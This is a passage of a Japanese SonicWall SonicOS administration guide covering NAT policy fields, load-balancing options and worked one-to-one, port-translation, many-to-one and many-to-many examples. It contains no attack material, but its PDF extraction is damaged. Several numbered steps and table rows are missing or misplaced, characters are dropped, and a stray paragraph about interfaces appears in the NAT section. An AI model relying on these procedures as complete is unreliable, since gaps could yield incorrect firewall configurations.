エントリとして指定できるのは、単一のホストのエントリ、アドレス範囲、または IP サブネットです。

• 変換後の送信元または変換後の IPv4 送信元このドロップダウンメニューでは、「変換前

の送信元」で指定した送信元からのパケットがファイアウォールから出るとき (つま

ヒント：「IPv6 変換前の送信元」では、 IPv6 アドレスオブジェクトのみがドロッ

プダウンメニューに表示され、作成可能です。

IP バージョン IPv4 および IPv6 IP バージョン NAT64



り、別のインターフェースに転送されるか、 VPN トンネルを出入りするとき)、送信元を

どのアドレスに変換するかを設定します。次の操作が可能です。

• 事前定義されたアドレスオブジェクトを指定する

• 「オリジナル」を選択する

• 独自のアドレスオブジェクトエントリを作成する

エントリとして指定できるのは、単一のホストのエントリ、アドレス範囲、または IP サブネットです。

• 変換前の送信先または Pref64: このドロップダウンメニューでは、ファイアウォールを通

過するパケット (インターフェース間を転送されるパケットや、 VPN トンネルを出入り

するパケット ) の送信先 IP アドレスを指定します。発信 NAT ではパケットの送信先は変

更されず、送信元のみが変更されるので、発信 NAT ポリシーの作成時には、通常、この

エントリは「すべて」に設定します。ただし、これらのアドレスオブジェクトのエント

リとして、単一のホストのエントリ、アドレス範囲、または IP サブネットを指定するこ

ともできます。

• 変換後の送信先: このドロップダウンメニューでは、「変換前の送信先」で指定した送信

先へのパケットがファイアウォールから出るとき (つまり、別のインターフェースに転

送されるか、 VPN トンネルを出入りするとき)、送信先をどのアドレスに変換するかを設

定します。発信 NAT ではパケットの送信先は変更されず、送信元のみが変更されるの

で、発信 NAT ポリシーの作成時には、通常、このエントリは「オリジナル」に設定しま

す。ただし、これらのアドレスオブジェクトのエントリとして、単一のホストのエント

リ、アドレス範囲、または IP サブネットを指定することもできます。

• 変換前のサービス: このドロップダウンメニューでは、ファイアウォールを通過するパ

ケット (インターフェース間を転送されるパケットや、 VPN トンネルを出入りするパ

ケット ) の IP サービスを指定します。ユーザはファイアウォールの事前定義されたサー

ビスを使用するか、または独自のエントリを作成することができます。多くの場合、NAT ポリシーでは送信元または送信先の IP アドレスのみを変更するので、このフィール

ドは「すべて」に設定します。

• 変換後のサービス: このドロップダウンメニューでは、「変換前サービス」で指定した

サービスのパケットがファイアウォールから出るとき (つまり、別のインターフェース

に転送されるか、 VPN トンネルを出入りするとき)、そのサービスをどのサービスに変換

するかを設定します。ユーザはファイアウォールの事前定義されたサービスを使用するか、または独自のエントリを作成することができます。多くの場合、 NAT ポリシーでは

送信元または送信先の IP アドレスのみを変更するので、このフィールドは「オリジナ

ル」に設定します。

ヒント：「Pref64」の場合、これは NAT ポリシーの変換前の送信先です。 IPv6 ネッ

トワークアドレスオブジェクトのみがドロップダウンメニューに表示され、作成

可能です。 Pref64 は常に pref64::/n ネットワークです。これは AAAA レコード

を作成するために DNS64 によって使用されます。

「既知の Pref64」を選択することも、ネットワークアドレスオブジェクトを

Pref64 として設定することもできます。

メモ：「IP バージョン」が「NAT64 のみ」の場合、このオプションは「埋め込み

IPv4 アドレス」に設定され、変更できません。

メモ：「IP バージョン」が「NAT64 のみ」の場合、このオプションは「ICMP UDPTCP」に設定され、変更できません。

メモ：「IP バージョン」が「NAT64 のみ」の場合、このオプションは「変換前」に

設定され、変更できません。



• 受信インターフェース: このドロップダウンメニューでは、パケットを受信するインター

フェースを指定します。既定は「すべて」です。

VPN トンネルは実際のインターフェースではないので、 VPN を扱う場合は、通常、「す

べて」 (既定) に設定します。

• 発信インターフェース: このドロップダウンメニューでは、 NAT ポリシー適用後のパケッ

トを送信するインターフェースを指定します。このフィールドは主に、どの WAN イン

ターフェースに変換を適用するかを指定するために使用されます。

VPN トンネルは実際のインターフェースではないので、 VPN を扱う場合は、通常、「す

べて」 (既定) に設定します。また、 NAT ポリシーの作成例 (114 ページ) に記載されてい

るように、送信先をパブリック IP アドレスからプライベート IP アドレスに再割付する受

信 1 対 1 NAT ポリシーの作成時には、このフィールドを「すべて」に設定する必要があ

ります。

• コメント : このフィールドは NAT ポリシー登録の説明を記述するために使用できます。

フィールドに入力できるのは大 32 文字です。保存後に「ルール > NAT ポリシー」メイ

ンページで NAT ポリシーエントリの「コメント」アイコンにマウスを移動すると、こ

こで指定した説明が表示されます。コメントは、マウスが「コメント」アイコン上にある間、ポップアップダイアログに表示されます。

• IP バージョン: IP バージョンを選択します。

• IPv4 のみ (既定)

• IPv6 のみ

• NAT64 のみ

• NAT ポリシーを有効にする: 既定では、このチェックボックスがオンになっています。こ

れは、新しい NAT ポリシーが保存された瞬間に有効になることを意味します。 NAT ポリ

シーエントリを作成しても、すぐに有効にしないようにするには、このチェックボック

スをオフにします。

• 再帰ポリシーを作成する: このチェックボックスをオンにすると、「NAT ポリシーの追加」

ダイアログで定義した NAT ポリシーに対応するミラーの発信または受信 NAT ポリシーが

自動的に作成されます。このオプションは、既定では選択されていません。

4 NAT 負荷分散を設定するには、「詳細」を選択します。それ以外の場合は、手順 8 にスキップし

て、現在の構成でポリシーを追加します。

重要：このフィールドの設定は、 NAT ポリシーのさまざまなフィールドの中でも特

に混乱しやすいので注意してください。

メモ：「NAT ポリシーの編集」ダイアログでは IP バージョンを変更できません。

重要：「NAT ポリシーの追加」ダイアログのオプションは、「NAT64 のみ」が選択

されると変更され、「詳細」ボタンは表示されません。

メモ：「詳細」ボタンは、「NAT64 のみ」が「IP バージョン」で選択されている場合、表

示されません。



5 「NAT 方式」の「詳細」画面で、「NAT 方式」ドロップダウンリストから次のいずれかを選択し

ます。

• スティッキー IP - 送信元 IP は、 (その接続先が接続可能な状態であるならば) 常に同じ送信

先 IPに接続されます。この方式は、ウェブアプリケーション、ウェブフォーム、

ショッピングカートアプリケーションなど、接続の恒久性が要求される公開ホストの

サイトに適です。これは既定のメカニズムであり、ほとんどの配備環境では、この方式を使用することをお勧めします。

• ラウンドロビン - 送信元 IP は、循環的な順序で、動作中の負荷分散対象の各リソースに

順に振り分けられます。この方式は、恒久性が要求されない状況で負荷を均等に分散したい場合に適です。

• ブロック再割付/対称再割付 - この 2 つの方式は、送信元 IP/ネットワークが既知のとき

(特定のサブネットからのトラフィックの変換方法を精密に制御したい場合など) に有用

です。

• ランダム分散 - 送信元 IP は、各送信先 IP にランダムに接続されます。この方式は、トラ

フィックを対象の内部リソース全体に無作為に分散させたい場合に有用です。

6 必要に応じて、ファイアウォールで NAT ポリシーの IP アドレス変換のみを行い、ポート変換を

行わないように指定するには、「送信元ポートの変換を無効にする」チェックボックスをオンにします。 SonicOS は、ほかの NAT マッピングを実行している間も接続の送信元ポートを保持

メモ：「送信元ポートの変換を無効にする」オプションを除き、このタブの他のすべてのオプションは、「一般」画面のいずれかのドロップダウンメニューでグループを指定

したときだけ有効になります。このタブが無効の場合、 NAT ポリシーでは NAT 方式として

既定の「スティッキー IP」が使用されます。



します。このオプションは、送信元 IP アドレスが変換されている場合の NAT ポリシーの追加ま

たは編集時に使用できます。このオプションは、既定では選択されていません。

メンテナンスその他の理由でインターフェースを一時的にオフラインにするとき、このオプションを選択します。接続していたリンクは切断されます。チェックボックスをオフにすると、インターフェースが有効になり再びリンクが接続されます。

7 「高可用性」セクションで、オプションで「論理監視を有効にする」を選択します。このチェックボックスがオンの場合、 SonicOS は、 2 つの方法 (ICMP Ping による単純な問い合わせによって

リソースが動作中であるかを判断する方法と、 TCP ソケットが開いているかを問い合わせて、

リソースが動作中であるかを判断する方法) のどちらかを使用して、負荷分散グループ内のア

ドレスの動作状態を監視します。この問い合わせは設定可能な一定の間隔で行われ、これにより、応答のないリソースへのトラフィックの振り分けの中止と、応答が復活した時点でのそのリソースの使用再開が可能になります。

「論理監視を有効にする」チェックボックスをオンにすると、以下のオプションが利用可能になります。

• ホストの論理監視間隔 n 秒毎 - ホストの論理監視の間隔を指定します。既定値は 5 秒です。

• 論理監視種別 - 論理監視種別 (TCP など) をドロップダウンメニューから選択します。既

定は Ping (ICMP) です。

• ポート - ポートを指定します。既定値は 80 です。

• 応答タイムアウト - タイムアウトまでの大時間を指定します。既定値は 1 秒です。

• ホストを停止するまでの無応答回数 n 回 - この回数を超えて応答が無い場合はホストを

停止します。既定値は 3 です。

• 停止したホストを再度有効にするまでの応答回数 n 回 - この回数以上応答に成功した場合

はホストを再度有効にします。既定値は 3 です。

• ポートプローブを有効にする - 上で選択した「論理監視種別」使用してポートプローブ

を有効にする場合に選択します。このオプションを選択すると、負荷分散時にポートも考慮するように NAT 機能が強化されます。このオプションは、既定では無効になってい

ます。

• RST 応答を未応答としてカウントする - RST 応答を未応答としてカウントするときに選択し

ます。このオプションは、「ポートプローブを有効にする」を選択した場合に、既定で

選択されます。

8 ポリシーを編集する場合は、「追加」を選択して NAT ポリシーを追加するか、「OK」を選択し

ます。

NAT ポリシーの削除単一の NAT ポリシーを削除するには、 NAT ポリシーエントリの「設定」列で「削除」アイコン (X) を選択します。このアイコンが淡色表示である場合、その NAT ポリシーは既定のエントリなので削除で

きません。

メモ：このオプションは、「変換後の送信元」 ( 「一般」画面上) が「オリジナル」に設定

された場合、無効で淡色表示になります。



1 つまたは複数のカスタムポリシーを削除するには、ポリシーのチェックボックスをオンにして、

テーブルの上部にある「削除」を選択し、「選択項目の削除」を選択します。

すべてのカスタムポリシーを削除するには、表の上部にある「削除」を選択し、「すべて削除」を選択します。

既定のポリシーは削除できません。

NAT ポリシーの作成例NAT ポリシーを使用すると、送信元の IP アドレス、送信先の IP アドレス、および送信先サービスの

一致する組み合わせに基づいて NAT (ネットワークアドレス変換) を柔軟に制御できます。 NAT はポリ

シーに基づいて適用されるため、異なる種類の NAT を同時に配備することができます。

特に指定のないかぎり、このセクションの例では、次の IP アドレスを例として使用して、 NAT ポリ

シーの作成と有効化を実証しています。ここで示す例をお使いの IP アドレスと置き換えることによ

り、これらの例を使用して、ネットワークの NAT ポリシーを作成することができます。

• 192.168.10.0/24 (インターフェース X0 上の IP サブネット )



• X0 の IP アドレスは 192.168.10.1

• X1 の IP アドレスは 67.115.118.68

• ウェブサーバの“プライベート "アドレスは 192.168.30.200

• ウェブサーバの“パブリック"アドレスは 67.115.118.70

• パブリック IP 範囲のアドレスは 67.115.118.71 から 67.115.118.74

トピック :

• 着信トラフィック用の 1 対 1 の NAT ポリシーの作成 (115 ページ)

• 着信トラフィック用の 1 対 1 の NAT ポリシーの作成 (118 ページ)

• 1 対 1 の NAT ポリシールールによる着信ポートアドレス変換 (120 ページ)

• WAN IP アドレス経由の着信ポートアドレス変換 (125 ページ)

• 多対 1 の NAT ポリシーの作成 (130 ページ)

• 多対多の NAT ポリシーの作成 (132 ページ)

• 1 対多の NAT 負荷分散の設定 (135 ページ)

• 2 つのウェブサーバの NAT 負荷分散の設定 (138 ページ)

• NAT64 ポリシーのための WAN から WAN へのアクセスルールの作成 (146 ページ)



着信トラフィック用の 1 対 1 の NAT ポリシーの作成

1 対 1 NAT ポリシーは、 SonicWall セキュリティアプライアンスでも一般的に使用される NAT ポリ

シーの種別です。このポリシーによって、外部の公開 IP アドレスを内部のプライベート IP アドレス

に変換できます。この NAT ポリシーを「許可」アクセスルールと組み合わせると、公開 IP アドレス

を使用して、任意の送信元を内部サーバに接続できます。ファイアウォールは、プライベートアド

レスと公開アドレス間の変換を処理します。このポリシーを適用すると、ファイアウォールは、webserver_public_ip へ着信したトラフィックを、 webserver_private_ip に送信します。

また、すべてのユーザがウェブサーバのパブリック IP アドレス経由でウェブサーバへの HTTP 接続を

確立できるようにアクセスルールを作成する必要があります。

この 1 対 1 インバウンド NAT ポリシーのミラー (リフレクティブ) ポリシーは、着信トラフィック用の

1 対 1 の NAT ポリシーの作成 (118 ページ) を参照してください。

内部サーバの実際のリスニングポートを隠し、別のポートのサーバにパブリックアクセスを提供するに

は、 1 対 1 の NAT ポリシールールによる着信ポートアドレス変換 (120 ページ) を参照してください。

着信トラフィック用の 1 対 1 のポリシーを作成するには、以下の手順に従います。

1 管理ビューで、「ポリシー | ルール > アクセスルール」ページを開きます。


3 オプションの選択: 1 対 1 着信トラフィックのアクセスルールの例の値を入力します。

オプションの選択: 1 対 1 着信トラフィックのアクセスルールの例

オプション値

動作許可

送信元 WAN

送信先サーバが配置されているゾーンを選択します。

送信元ポートポートを選択。既定は「すべて」

メモ：「送信元ポート」を設定すると、アクセスルールは選択さ

れたサービスオブジェクト /グループで定義されている送信元

ポートに基づいてトラフィックをフィルタ処理します。選択されたサービスオブジェクト /グループには、「サービス」で選択す

るのと同じプロトコル種別が設定されている必要があります。

サービス HTTP

送信元すべて



4 「追加」を選択します。ルールが追加されます。

5 「閉じる」を選択します。

6 「ポリシー | ルール > NAT ポリシー」ページを開きます。

7 「追加」を選択して、「NAT ポリシーの追加」ダイアログを表示します。

8 オプションの選択: 1 対 1 着信 NAT ポリシーテーブルに表示された値を入力します。

送信先 webserver_public_ip (サーバのパブリック IP アドレスを含むアドレ

スオブジェクト )

包含ユーザすべて (既定)

除外ユーザなし (既定)

スケジュール常に有効 (既定)

コメント簡単な説明を入力

ログを有効にする選択

断片化パケットを許可する選択

他のすべてのオプション未選択

オプションの選択: 1 対 1 着信トラフィックのアクセスルールの例

オプション値



9 「追加」を選択し、「閉じるを選択します。

設定が完了したら、パブリックインターネット上に配置されているシステムを使用して、ウェブ

サーバのパブリック IP アドレスへのアクセスを試行します。正常に接続できるはずです。接続不可

の場合は、このセクションと着信トラフィック用の 1 対 1 の NAT ポリシーの作成セクションを調べ

て、必要なすべての項目を正しく設定したことを確認します。

オプションの選択: 1 対 1 着信 NAT ポリシー

オプション値

変換前の送信元すべて

変換後の送信元オリジナル

変換前の送信先 webserver_public_ip

変換後の送信先 webserver_private_ip

変換前のサービス HTTP

変換後のサービスオリジナル

受信インターフェース X1

発信インターフェースすべて

メモ：サーバが接続されているインターフェースではなく、「すべて」を選択します。


NAT ポリシーを有効にするオン

再帰ポリシーを作成するチェックされていない



着信トラフィック用の 1 対 1 の NAT ポリシーの作成

着信トラフィック用の 1 対 1 の NAT は、外部のパブリック IP アドレスを内部のプライベート IP アド

レスに変換できます。この NAT ポリシーを "許可" アクセスポリシーと組み合わせると、任意の送信

元がパブリック IP アドレスを使用して内部サーバに接続できるようになります。プライベートアド

レスとパブリックアドレス間の変換は SonicWall によって処理されます。このポリシーを適用する

と、 SonicWall セキュリティ装置は、 WAN インターフェース (既定では X1 インターフェース) 経由での

接続要求の到着時に、サーバのパブリック IP アドレスをプライベート IP アドレスに変換します。以下では、必要なアドレスオブジェクトとともに NAT ポリシーを作成し、同時に発信トラフィック用

の再帰 NAT ポリシーも作成します。再帰的 NAT ポリシーは着信トラフィック用の 1 対 1 の NAT ポリ

シーの作成 (115 ページ) に記述されています。

発信トラフィック用の 1 対 1 のポリシーを作成するには、以下の手順に従います。

1 管理ビューで、「ポリシー | オブジェクト > アドレスオブジェクト」ページを開きます。

2 ページの上部にある「追加」を選択します。「アドレスオブジェクトの追加」ダイアログが表

示されます。

3 「名前」フィールドに、 webserver_private_ip など、サーバのプライベート IP アドレスのわかりや

すい説明を入力します。

4 「ゾーンの割り当て」ドロップダウンメニューから、サーバに割り当てるゾーンを選択します。

5 「種別」ドロップダウンメニューで「ホスト」を選択します。

6 「IP アドレス」フィールドにサーバのプライベート IP アドレスを入力します。

7 「追加」を選択します。新しいアドレスオブジェクトが「アドレスオブジェクト」テーブルに

追加されます。



8 次に、手順 2 ～手順 7 を繰り返して「アドレスオブジェクトの追加」ダイアログで、サーバの

パブリック IP アドレスに別のオブジェクトを作成し、「ゾーンの割り当て」ドロップダウン

メニューで「WAN」を選択します。「名前」は、 webserver_public_ip を使用してください。

9 「追加」を選択してアドレスオブジェクトを作成します。新しいアドレスオブジェクトが「ア

ドレスオブジェクト」テーブルに追加されます。

10 「閉じる」を選択して「アドレスオブジェクトの追加」ダイアログを閉じます。


12 ページの上部にある「追加」を選択します。「NAT ポリシーの追加」ダイアログが表示され

ます。

13 NAT ポリシーを作成することにより、ウェブサーバがマッピング済みのパブリック IP アドレス

を使用してパブリックインターネットへのトラフィックを開始できるようにするには、オプ

ションの選択: 発信トラフィック用の 1 対 1 の NAT ポリシーの例のオプションを選択します。

オプションの選択: 発信トラフィック用の 1 対 1 の NAT ポリシーの例

オプション値

変換前の送信元 webserver_private_ip

変換後の送信元 webserver_public_ip

変換前の送信先すべて

変換後の送信先オリジナル

変換前のサービスすべて



発信インターフェース X1



再帰ポリシーを作成する (翻訳先がオリジナルの場

合は淡色表示されます)



14 設定が完了したら、「追加」ボタンを選択し、 NAT ポリシーを追加して有効にします。

15 「閉じる」を選択して「NAT ポリシーの追加」ダイアログを閉じます。

このポリシーを適用すると、ファイアウォールは、 WAN インターフェース (既定では X1 インター

フェース) からのトラフィック開始時に、サーバのプライベート IP アドレスをパブリック IP アドレス

に変換します。

サーバでウェブブラウザを開き、公開ウェブサイト http://www.whatismyip.com にアクセスすること

によって、 1 対 1 の割付をテストできます。このウェブサイトには、作成したばかりの NAT ポリシー

でプライベート IP アドレスに付加された公開 IP アドレスが表示されるはずです。

1 対 1 の NAT ポリシールールによる着信ポートアドレス変換

このタイプの NAT ポリシーは、内部サーバの実際のリスニングポートを隠して、別のポートでの

サーバへのパブリックアクセスを可能にしたい場合に便利です。以下の例では、着信トラフィック

用の 1 対 1 の NAT ポリシーの作成セクションで作成した NAT ポリシーとルールを変更して、パブリッ

クユーザがパブリック IP アドレスを通じてプライベートウェブサーバに接続できるようにします

が、その接続には、標準の HTTP ポート (TCP 80) の代わりに、別のポート (TCP 9000) を使用するように

設定します。



http://www.whatismyip.com

着信ポートアドレス変換のための 1 対 1 のポリシーを作成するには、以下の手順に従います。

1 管理ビューで、「ポリシー | オブジェクト > サービスオブジェクト」ページを開きます。この

ページでは、使用する非標準ポートのユーザ定義サービスを作成します:

2 「サービスオブジェクト」画面で「追加」を選択して、「サービスの追加」ダイアログを表示

します。

3 ユーザ定義サービスに webserver_public_port などのわかりやすい名前を付けます。

4 「プロトコル」ドロップダウンメニューで「TCP (6)」を選択します。

5 「ポート範囲」の場合、両方のフィールドに9000 をサービスの開始および終了ポート番号とし

て入力します。

6 設定が完了したら、「追加」ボタンを選択してユーザ定義サービスを保存し、「閉じる」を選択します。



「サービスオブジェクト」画面が更新されます。

7 「ルール > NAT ポリシー」ページを開きます。

着信トラフィック用の 1 対 1 の NAT ポリシーの作成セクションで作成した、パブリックユーザ

がパブリック IP アドレスを通じてプライベートウェブサーバに接続できるようにする NAT ポリシーを変更します。

8 NAT ポリシーの横の「編集」ボタンを選択します。「NAT ポリシーの編集」ダイアログが表示

されます。

9 オプションの選択: 1 対 1 の NAT ポリシールールによる着信ポートアドレス変換テーブルのオ

プションを設定して NAT ポリシーを編集します。



10 「OK」を選択し、「閉じる」を選択します。

このポリシーを適用すると、ファイアウォールは、 WAN インターフェース (既定では X1 イン

ターフェース) 経由での接続要求の到着時に、サーバのパブリック IP アドレスをプライベート

IP アドレスに変換し、要求されたポート (TCP 9000) をサーバの実際のリスニングポート (TCP80) に変換します。

オプションの選択: 1 対 1 の NAT ポリシールールによる着信ポートアドレス変換

オプション値



変換前の送信先 webserver_public_ip

変換後の送信先 webserver_private_ip

変換前のサービス webserver_public_port (または上記で付けた任意の名前)

変換後のサービス HTTP





メモ：着信インターフェースの設定では、サーバが接続されているインターフェースを指定するのではなく、必ず「すべて」を選択してください。これは直観に反しているように思われるかもしれませんが、正しい設定です (インターフェースを指定しようとする

と、エラーが発生します)。



11 後に、前のセクションで作成したファイアウォールアクセスルールを変更して、すべての

パブリックユーザがサーバの実際のリスニングポート (TCP 80) の代わりに新しいポート (TCP9000) でウェブサーバに接続できるようにします。

「ルール > アクセスルール]ページに移動し、 webserver_public_ip のルールを検索します。

12 「編集」アイコンを選択し、「ルールの編集」ダイアログでルールを表示します。

13 オプションの選択: 1 対 1 の NAT ポリシールールによる着信ポートアドレス変換テーブルに従っ

て値を編集します。


オプション値

動作許可

サービス webserver_public_port (または任意の名前)

送信元すべて

送信先 webserver_public_ip

許可ユーザすべて

スケジュール常に有効




確認するには、パブリックインターネット上に配置されているシステムを使用して、新しい個別

ポートでウェブサーバのパブリック IP アドレスにアクセスしてください (例: http://67.115.118.70:9000 など)。正常に接続できるはずです。接続不可の場合は、この

セクションを調べて、必要なすべての項目を正しく設定したことを確認します。

WAN IP アドレス経由の着信ポートアドレス変換

これは、 SonicOS が動作しているファイアウォール上に作成できる、より複雑な NAT ポリシーの 1 つで、ファイアウォールの WAN IP アドレスを使用して、複数の内部サーバにアクセスできるようにな

ります。このポリシーが特に有効なのは、 ISP から 1 つのパブリック IP アドレスしか提供されず、そ

の IP アドレスをファイアウォールの WAN インターフェース (既定では X1 インターフェース) で使用す

る必要がある場合などです。

ログオン



オプション値



以下では、ファイアウォールの WAN IP アドレス経由で 2 台の内部ウェブサーバへのパブリックアク

セスを提供する設定を行います。各サーバは固有の個別ポートに接続されます。ポートがすべて一意である限り、 2 つ以上を作成することが可能です。

ファイアウォールの WAN IP アドレスを使用して複数の内部サーバにアクセスできるようにするに

は、以下の作業を行います。

1 サーバが応答する固有のパブリックポートに対応する 2 つのユーザ定義サービスオブジェクト

を作成します。サービスオブジェクトの作成を参照してください。

2 サーバのプライベート IP アドレスに対応する 2 つのアドレスオブジェクトを作成します。アド

レスオブジェクトの作成を参照してください。

3 2 つの NAT ポリシーを作成して、 2 台のサーバがパブリックインターネットへのトラフィック

を開始できるようにします。発信 NAT ポリシーの作成を参照してください。

4 2 つの NAT ポリシーを作成して、個別ポートを実際のリスニングポートに割り付け、各サーバ

のプライベート IP アドレスをファイアウォールの WAN IP アドレスに割り付けます。受信 NATポリシーの作成を参照してください。

5 2 つのアクセスルールを作成して、任意のパブリックユーザが、ファイアウォールの WAN IP アドレス経由で両方のサーバ、および各サーバの固有の個別ポートに接続できるようにします。アクセスルールの作成を参照してください。

WAN IP アドレス経由の着信ポートアドレス変換ポリシーを作成するには、以下の手順に従

います。

サービスオブジェクトの作成

1 管理ビューで、「ポリシー | オブジェクト > サービスオブジェクト」ページを開きます。

2 「追加」ボタンを選択します。「サービスの追加」ダイアログが表示されます。

3 「名前」に対して、 servone_public_port や servtwo_public_port などのカスタムサービスオブジェ

クト名を入力します。

4 プロトコルとして「TCP (6)」を選択します。

5 9100 を servone_public_port の開始および終了ポートとして入力します。

6 9200 を servtwo_public_port の開始および終了ポートとして入力します。

7 それぞれのユーザ定義サービスを設定した後は、「追加」ボタンを選択してユーザ定義サービスを保存します。

8 両方のユーザ定義サービスを設定したら、「閉じる」ボタンを選択します。

アドレスオブジェクトの作成

1 管理ビューで、 [ポリシー | オブジェクト > アドレスオブジェクト」ページを開きます。

2 「追加」ボタンを選択します。「アドレスオブジェクトの追加」ダイアログが表示されます。



3 「名前」に対して、 servone_private_ip や servtwo_private_ip などのカスタムサービスオブジェク

ト名を入力します。

4 「ゾーンの割り当て」ドロップダウンメニューで、サーバが配置されているゾーンを選択し

ます。

5 「種別」ドロップダウンメニューで「ホスト」を選択します。

6 「IP アドレス」フィールドにサーバのプライベート IP アドレスを入力します。

7 それぞれのアドレスオブジェクトを設定した後は、「追加」ボタンを選択してアドレスオブ


8 両方のアドレスオブジェクトを設定したら、「閉じる」ボタンを選択します。

発信 NAT ポリシーの作成

1 管理ビューで、「ポリシー | ルール > NAT ポリシー」ページを開きます。

2 「追加」ボタンを選択します。「NAT ポリシーの追加」ダイアログが表示されます。

3 2 つの NAT ポリシーを作成して、両方のサーバがファイアウォールの WAN IP アドレスを使用し

てパブリックインターネットへのトラフィックを開始できるようにするには、オプションの選

択: インターネットへのトラフィックを開始する 2 台のサーバテーブルに示す 2 つのオプショ

ンセットを設定します。

4 サーバごとに NAT ポリシーを設定した後は、「追加」ボタンを選択し、その NAT ポリシーを追

加して有効にします。

オプションの選択: インターネットへのトラフィックを開始する 2 台のサーバ

オプションサーバ 1 の値サーバ 2 の値

変換前の送信元 servone_private_ip servtwo_private_ip

変換後の送信元 WAN Interface IP WAN Interface IP

変換前の送信先すべてすべて

変換後の送信先オリジナルオリジナル

変換前のサービスすべてすべて

変換後のサービスオリジナルオリジナル

受信インターフェース X3 X3

発信インターフェース X1 X1

コメント簡単な説明を入力簡単な説明を入力

NAT ポリシーを有効にするオンオン

再帰ポリシーを作成する (淡色表示) (淡色表示)



5 両方 NAT ポリシーを設定したら、「閉じる」ボタンを選択します。

これらのポリシーを適用すると、ファイアウォールは、インターフェース (既定では X1 イン

ターフェース) からのトラフィック開始時に、サーバのプライベート IP アドレスをパブリック

IP アドレスに変換します。

受信 NAT ポリシーの作成

1 再び「ルール > NAT ポリシー」ページの「追加」ボタンを選択します。「NAT ポリシーの追加」


2 カスタムポートを両方のサーバの実際のリスニングポートにマップし、ファイアウォールの

WAN IP アドレスをサーバーのプライベートアドレスにマップする 2 つの NAT ポリシーを作成

するには、オプションの選択: サーバへの個別ポートの割付テーブルに示す 2 つのオプション

セットを構成します。

オプションの選択: サーバへの個別ポートの割付


変換前の送信元すべてすべて

変換後の送信元オリジナルオリジナル

変換前の送信先 WAN Interface IP WAN Interface IP

変換後の送信先 servone_private_ip servtwo_private_ip

変換前のサービス servone_public_port servtwo_public_port

変換後のサービス HTTP HTTP

受信インターフェース X1 X1

発信インターフェースすべてすべて

メモ：送信先インターフェースの設定では、サーバが接続されているインターフェースを指定するのではなく、必ず「すべて」を選択してください。



3 サーバごとに NAT ポリシーを設定した後は、「追加」ボタンを選択し、その NAT ポリシーを追

加して有効にします。

4 両方 NAT ポリシーを設定したら、「閉じる」ボタンを選択します。

これらのポリシーを適用すると、ファイアウォールは、 WAN インターフェース (既定では X1 インターフェース) 経由での接続要求の到着時に、サーバのパブリック IP アドレスをプライベー

ト IP アドレスに変換します。

アクセスルールの作成


2 「追加」ボタンを選択します。「ルールの追加」ダイアログが表示されます。

3 パブリックインターネットのすべてのユーザが個別ポートとファイアウォールの WAN IP アドレ

スを使用して 2 台のウェブサーバにアクセスできるようにするためのアクセスルールを作成

するには、オプションの選択: アクセスルールの作成テーブルに示されている 2 つのオプショ

ンを設定します。


NAT ポリシーを有効に

する

オンオン

再帰ポリシーを作成する消去消去

オプションの選択: アクセスルールの作成


動作許可許可

送信元 WAN WAN

送信先サーバに割り当てられたゾーン

サーバに割り当てられたゾーン

オプションの選択: サーバへの個別ポートの割付




4 サーバごとにアクセスルールを設定した後は、「追加」ボタンを選択し、そのアクセスルール

を追加して有効にします。

5 両方のアクセスルールを設定したら、「閉じる」ボタンを選択します。

テストと検証

確認するには、新しいカスタムポートのパブリックインターネットにあるシステムを使用し

て、ファイアウォールの WAN IP アドレスを使用して Web サーバにアクセスしてください (例:http://67.115.118.70:9100 と http://67.115.118.70:9200 など)。正常に接続でき

るはずです。接続不可の場合は、このセクションとを調べて、必要なすべての項目を正しく設定したことを確認します。

多対 1 の NAT ポリシーの作成

多対 1 は SonicWall セキュリティ装置で非常に一般的な NAT ポリシーであり、アドレスのグループを

単一のアドレスに変換することができます。ほとんどの場合、これは、内部 "プライベート " IP サブ

ネットを対象として、そこから送信されるすべての要求をファイアウォールの WAN インターフェー

ス (既定では X1 インターフェース) の IP アドレスからの要求に変換することを意味します。この変換

を行うと、送信先からは、その要求の送信元が内部プライベート IP アドレスではなく、ファイア

ウォールの WAN インターフェースの IP アドレスであるかのように見えます。

送信元ポートすべてすべて

サービス servone_public_port servtwo_public_port

送信元すべてすべて

送信先 WAN Interface IP WAN Interface IP

包含ユーザすべてすべて

除外ユーザなしなし

スケジュール常に有効常に有効

ログオンオン


オプションの選択: アクセスルールの作成




多対 1 のポリシーを作成するには、以下の手順に従います。


2 「追加」ボタンを選択します。「NAT ポリシーの追加」ダイアログが表示されます。

3 NAT ポリシーを作成して X3 インターフェース上のすべてのシステムがファイアウォールの WANポートの IP アドレスを使用してトラフィックを開始できるようにするには、以下のオプション


オプションの選択: 多対 1 の NAT ポリシーの例

オプション値

変換前の送信元 X3 サブネット

変換後の送信元 WAN Interface IP





4 「追加」ボタンを選択し、 NAT ポリシーを追加して有効にします。新しいポリシーが「NAT ポリ

シー」テーブルに追加されます。


多対多の NAT ポリシーの作成

多対多の NAT ポリシーを使用すると、特定のアドレスグループを別のアドレスグループに変換でき

ます。このポリシーによって、ファイアウォールでは、複数のアドレスを利用した動的変換を実行できます。多対多の NAT ポリシーに、同じネットワーク接頭辞を持つ変換前の送信元と変換後の送信元

が含まれる場合、 IP アドレスの残りの部分は変わりません。







再帰ポリシーを作成する (淡色表示)

メモ：このポリシーは、ファイアウォールのその他のインターフェースの背後にあるサブネットで複製できます。手順は次のとおりです。

1 「変換前の送信元」をそのインターフェースの背後にあるサブネットに変更する。2 送信元のインターフェースを調整する。3 別の NAT ポリシーを追加する。

オプションの選択: 多対 1 の NAT ポリシーの例

オプション値



多対多のポリシーを作成するには、以下の手順に従います。


2 ページの上部にある「追加」を選択します。「アドレスオブジェクトの追加」ダイアログが表

示されます。

3 「名前」フィールドにアドレス範囲の説明 (public_range など) を入力します。

4 「ゾーンの割り当て」ドロップダウンメニューで、ゾーンとして「WAN」を選択します。

5 「種別」ドロップダウンメニューで「範囲」を選択します。「アドレスオブジェクトの追加」

ダイアログの表示が変化します。

6 「開始アドレス」フィールドと「終了アドレス」フィールドにアドレスの範囲 (通常は ISP から

割り当てられるパブリック IP アドレス) を入力します。

7 「追加」を選択して範囲オブジェクトを作成します。新しいアドレスオブジェクトが「アドレ

スオブジェクト」テーブルに追加されます。





10 「NAT ポリシー」ページの上部にある「追加」を選択します。「NAT ポリシーの追加」ダイアロ

グが表示されます。

11 NAT ポリシーを作成することにより、 LAN サブネット (既定では X0 インターフェース) 上のシス

テムがパブリック範囲のアドレスを使用してトラフィックを開始できるようにするには、オプションの選択: 多対多の NAT ポリシーの例のオプションを選択します。

12 「追加」を選択して、 NAT ポリシーを追加して有効化します。新しいポリシーが「NAT ポリシー」

